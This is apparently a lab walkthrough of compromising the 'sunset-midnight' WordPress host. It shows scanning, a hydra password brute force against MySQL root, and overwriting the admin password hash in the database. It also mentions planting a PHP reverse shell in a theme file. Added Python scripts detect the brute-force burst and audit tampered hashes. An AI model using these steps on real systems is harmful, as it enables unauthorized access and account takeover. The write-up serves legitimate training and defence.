PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
3306/tcp filtered mysql
When we try to visit http://192.168.164.88/wp-admin, we see that the site refers to the hostname http://sunset-midnight. We add sunset-midnight to /etc/hosts:
192.168.164.88 sunset-midnight
Now we can view the website.
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://sunset-midnight/
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
[+] URL: <http://sunset-midnight/> [192.168.164.88]
[+] Started: Thu Aug 11 08:55:23 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: <http://sunset-midnight/robots.txt>
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://sunset-midnight/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] Upload directory has listing enabled: <http://sunset-midnight/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://sunset-midnight/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://sunset-midnight/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://sunset-midnight/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: <http://sunset-midnight/wp-content/themes/twentyseventeen/>
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: <http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt>
| [!] The version is out of date, the latest version is 3.0
| Style URL: <http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507>
| Style Name: Twenty Seventeen
| Style URI: <https://wordpress.org/themes/twentyseventeen/>
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507>, Match: 'Version: 2.3'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] simply-poll-master
| Location: <http://sunset-midnight/wp-content/plugins/simply-poll-master/>
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt>
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - <http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt>
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:02:23 <================================================================================================================> (137 / 137) 100.00% Time: 00:02:23
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://sunset-midnight/ --enumerate u
<......SNIPPET......>
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - <http://sunset-midnight/wp-json/wp/v2/users/?per_page=100&page=1>
| Oembed API - Author URL (Aggressive Detection)
| - <http://sunset-midnight/wp-json/oembed/1.0/embed?url=http://sunset-midnight/&format=json>
| Rss Generator (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
Since the web page is extremely slow, we will try brute-forcing MySQL instead.
┌──(kali㉿kali)-[~]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt sunset-midnight mysql
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) starting at 2022-08-11 09:16:23
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://sunset-midnight:3306/
[3306][mysql] host: sunset-midnight login: root password: robert
1 of 1 target successfully completed, 1 valid password found
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) finished at 2022-08-11 09:17:02
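From the defender's side, the hydra run above leaves a dense burst of failed root logins in the MariaDB error log. The following is an added example, not part of the original write-up: it flags such bursts in constructed log lines, assuming the server writes access-denied warnings to its error log (MariaDB does when log_warnings >= 2); the guessing host 192.168.164.50 is made up.

```python
"""Detect password guessing against MariaDB/MySQL from error-log lines.
Added example, not from the original write-up. Assumes "Access denied"
warnings reach the error log (MariaDB does this when log_warnings >= 2).
All log lines below are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

# MariaDB 10.3 error-log format; the hour may be space-padded to one digit:
# "2022-08-11  9:16:24 950 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)"
DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}\s+\d{1,2}:\d{2}:\d{2})\s+\d+\s+\[Warning\]\s+"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)

def parse_denials(lines):
    """Yield (timestamp, user, host) for every access-denied warning."""
    for line in lines:
        m = DENIED.match(line)
        if m:
            ts = datetime.strptime(" ".join(m.group("ts").split()), "%Y-%m-%d %H:%M:%S")
            yield ts, m.group("user"), m.group("host")

def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return one alert per (user, host) reaching `threshold` failures inside a
    sliding window of `window_s` seconds: a wordlist run like the hydra session
    above is a dense burst, while isolated typos never accumulate."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, user, host in parse_denials(lines):
        key = (user, host)
        q = recent[key]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"user": user, "host": host, "first": q[0], "last": ts, "failures": len(q)})
    return alerts

# Constructed sample: a burst from one guessing host, plus one typo elsewhere.
SAMPLE_LOG = [
    "2022-08-11  9:16:23 0 [Note] /usr/sbin/mysqld: ready for connections.",
    "2022-08-11  9:16:24 950 [Warning] Access denied for user 'root'@'192.168.164.50' (using password: YES)",
    "2022-08-11  9:16:24 951 [Warning] Access denied for user 'root'@'192.168.164.50' (using password: YES)",
    "2022-08-11  9:16:24 952 [Warning] Access denied for user 'root'@'192.168.164.50' (using password: YES)",
    "2022-08-11  9:16:25 953 [Warning] Access denied for user 'root'@'192.168.164.50' (using password: YES)",
    "2022-08-11  9:16:25 954 [Warning] Access denied for user 'root'@'192.168.164.50' (using password: YES)",
    "2022-08-11  9:16:30 955 [Warning] Access denied for user 'wpuser'@'192.168.164.20' (using password: YES)",
]
```

Running detect_bruteforce(SAMPLE_LOG) yields a single alert for root from 192.168.164.50 with five failures; the lone wpuser failure never reaches the threshold.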
Now we know the root password is robert.
┌──(kali㉿kali)-[~]
└─$ mysql -u root -p -h sunset-midnight
Enter password: robert
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 949
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> use wordpress_db
MariaDB [wordpress_db]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin | [email protected] | <http://sunset-midnight> | 2020-07-16 19:10:47 | | 0 | admin |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.237 sec)
MariaDB [wordpress_db]>
From here, we know that user_pass can be updated since we have root privilege on MySQL. WordPress still accepts a plain MD5 hash in user_pass (it rehashes it on the next login), so we generate an MD5 hash of the new password at https://www.md5hashgenerator.com/ and set it:
UPDATE wp_users SET user_pass="5f4dcc3b5aa765d61d8327deb882cf99" WHERE ID=1;
MariaDB [wordpress_db]> UPDATE wp_users SET user_pass="5f4dcc3b5aa765d61d8327deb882cf99" WHERE ID=1;
Query OK, 1 row affected (0.229 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Now that we have changed the admin password to password, we can log in to the WordPress dashboard and add php-reverse-shell to the twentyseventeen theme's 404.php.
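As an added defensive check (not part of the original write-up): a script that flags wp_users rows whose hash WordPress could not have written itself, which is exactly the trace the UPDATE above leaves behind. The rows below are constructed to mirror the table shown above, and the backup account is made up.

```python
"""Audit wp_users password hashes for signs of direct database tampering.
Added example, not from the original write-up. Rows below are constructed to
mirror the wp_users table shown above; in practice feed it the result of
SELECT ID, user_login, user_pass FROM wp_users."""
import re

# The only format WordPress 5.x writes itself: phpass, "$P$" (or "$H$") plus
# 31 characters of salt and hash, 34 characters in total.
PHPASS = re.compile(r"^\$[PH]\$[./0-9A-Za-z]{31}$")
# Legacy format WordPress still accepts at login: unsalted MD5, 32 hex chars.
# wp_check_password() upgrades it to phpass on the next successful login, so a
# raw MD5 sitting in the table was written there directly, as the UPDATE above does.
LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")

def classify_hash(user_pass):
    """Name the storage format of one user_pass value."""
    if PHPASS.match(user_pass):
        return "phpass"
    if LEGACY_MD5.match(user_pass):
        return "legacy-md5"
    return "empty" if user_pass == "" else "unknown"

def audit_users(rows):
    """Return (ID, user_login, reason) for every row WordPress itself could
    not have produced; each one is worth correlating with DB access logs."""
    findings = []
    for uid, login, user_pass in rows:
        kind = classify_hash(user_pass)
        if kind == "legacy-md5":
            findings.append((uid, login, "raw MD5 in user_pass: set directly in the database"))
        elif kind != "phpass":
            findings.append((uid, login, f"unrecognised hash format ({kind})"))
    return findings

# Constructed rows: the admin hash as the write-up first found it, the same
# account after the UPDATE statement above, and a blank disabled account.
SAMPLE_ROWS = [
    (1, "admin", "$P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/"),
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "backup", ""),
]
```

audit_users(SAMPLE_ROWS) reports the second admin row (raw MD5) and the blank backup row, while the original phpass hash passes.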